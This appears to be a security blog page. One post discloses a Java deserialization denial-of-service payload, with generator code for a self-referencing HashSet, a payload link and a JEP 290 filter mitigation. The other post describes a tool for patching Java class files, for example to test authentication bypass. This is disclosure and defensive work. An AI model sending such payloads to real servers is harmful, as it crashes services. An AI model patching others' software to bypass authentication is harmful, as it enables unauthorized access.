Tuesday, February 19, 2019

DOS Payload (works on latest JRE) for Java Deserialization issue

When a server reads the serialized payload below with the latest JRE version (or an older one), the server crashes instantly with a StackOverflowError.

Payload:
https://github.com/csanuragjain/extra/blob/master/Deserialization%20issue/payloadNew.txt?raw=true

How is it created:

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;

public class Payload2 {

    public static void main(String[] args) throws Exception {
        // Outer set that holds a single element: the inner set
        Set<Object> s = new HashSet<>();
        // Inner set that will contain itself. It is added to s first, because once
        // it contains itself, hashCode() on it recurses without end.
        Set<Object> entry = new HashSet<>();
        s.add(entry);
        entry.add(entry);
        // Serialize the graph; the self-reference is written as a back-reference handle
        try (FileOutputStream fos = new FileOutputStream("payloadNew.txt");
             ObjectOutputStream oos = new ObjectOutputStream(fos)) {
            oos.writeObject(s);
        }
    }
}

What happens when the server reads it:
The server crashes with a StackOverflowError.

What Oracle has to say:
There is no default JEP 290 serial filter that applies to all RMI
applications and eliminates all issues.  It is up to the application
writer to choose the configuration that makes an application the safest
it can be (given it's deserializing untrusted data).  In the given
examples HashMap and HashSet could be blocked to eliminate that issue.

In short, Oracle's advice is to block both of these classes using the serial filter.

My thoughts:
Not quite sure why an internal loop is even allowed.
The best way to mitigate this issue is not to trust any user-provided serialized data. But if you have to read it, then you need to be aware of these issues and should completely block these classes at least (although I think some other payload will always come).
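As an added example (not code from the original post), here is a reader that applies the JEP 290 filter Oracle refers to before deserializing untrusted bytes: it rejects HashSet and HashMap as Oracle suggested, and denies every class not explicitly listed. It rebuilds the same self-referencing set in memory as a constructed sample, assumes Java 9 or later for java.io.ObjectInputFilter, and the class name FilteredReader and the pattern string are my own choices.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;

public class FilteredReader {

    // JEP 290 filter: reject the two classes Oracle named, cap graph depth, allow the rest of
    // java.base, reject everything else. Patterns are matched in order, first match wins.
    // maxdepth alone would NOT stop this payload: the overflow is hashCode() recursing over a
    // set that contains itself, not deep stream nesting. The class rejection is what stops it.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=10;!java.util.HashSet;!java.util.HashMap;java.base/*;!*");

    // Deserialize untrusted bytes; the filter rejects HashSet before HashSet.readObject runs.
    static Object readFiltered(byte[] data) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    // Constructed sample: the same self-referencing structure the post's generator writes.
    static byte[] selfReferencingSet() throws Exception {
        Set<Object> entry = new HashSet<>();
        Set<Object> outer = new HashSet<>();
        outer.add(entry);   // must happen before entry contains itself
        entry.add(entry);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(outer);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = selfReferencingSet();
        try {
            readFiltered(payload);
            System.out.println("accepted (unexpected)");
        } catch (InvalidClassException e) {
            // Expected path: the JDK reports "filter status: REJECTED"
            System.out.println("rejected by filter: " + e.getMessage());
        }
    }
}
```

Without the setObjectInputFilter call, the same readObject crashes the process with a StackOverflowError instead of throwing a catchable exception.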

Let me know your thoughts...

Monday, January 28, 2019

ClassModifier : Utility to easily modify your Java class files

Modify your Java class files easily with an interactive GUI.

Since a class file cannot be edited directly, this tool converts the class file to its Smali form, which is editable. After you make the required changes, the tool converts the modified Smali back into a modified class file.
Features:
  • Modify a given Java class file
  • Allows pen-testers to verify whether their Java desktop application is safe from auth bypass
  • Can help you change the logical behaviour of a JAR file by modifying a class
  • You can override private methods and change the access modifiers of a class's variables using ClassModifier.
  • Many other possibilities....

Download ClassModifier:



How to Use:

java -jar ClassModifier.jar

Menu:

File
  1. Open class (CTRL+O) – Opens the input class that needs to be modified
  2. Open Project (CTRL+P) – Reopens a project created with this tool
  3. Save & Convert (CTRL+S) – Saves and converts the code into the modified class and Smali files
  4. Export Class (CTRL+E) – Exports the modified class
  5. Java 2 Smali Helper – Opens a tab where you can write any Java code; on saving, it shows the equivalent Smali code
  6. Smali 2 Java Helper – Opens a tab where you can write any Smali code; on saving, it shows the equivalent Java code
Edit
  1. Increase Code FontSize (CTRL+I) – Increases the font size of the shown code
  2. Decrease Code FontSize (CTRL+D) – Decreases the font size of the shown code
  3. Remove all tabs – Closes all currently shown tabs
Decompiler
  1. Change Decompiler – Allows you to switch between jadx and jd-cli decompilers.

Help
  1. Update Software – Updates the software if a newer version is available
  2. How to use Class Modifier – Contains the documentation of this tool

Toolbar
  1. Find, replace, and replace-all in the current code, and find across all classes

ClassModifier_lib Folder

  1. Ships along with the software
  2. Contains the helper JARs used by the program
  3. ClassModifier_lib\userLibrary is automatically added to the classpath while compiling code. If you wish to compile your code against external JARs, place them inside ClassModifier_lib\userLibrary

How to Use:
  • Open the Java class to be modified
  • On opening, ClassModifier shows the Smali version of the class file
  • Edit the Smali file and make the required changes
  • Save the Smali file
  • The modified Java class file is created and can be exported at any time using File -> Export Class.
  • Since editing Smali can be difficult, two helpers are provided: Java 2 Smali and Smali 2 Java.
  • As the name suggests, Java 2 Smali Helper shows the Smali equivalent of the Java code you enter.
  • Similarly, Smali 2 Java Helper shows the Java equivalent of the Smali code you enter.

Screenshot:




Note: This software is meant for educational purpose only. Don't use it for any illegal activity.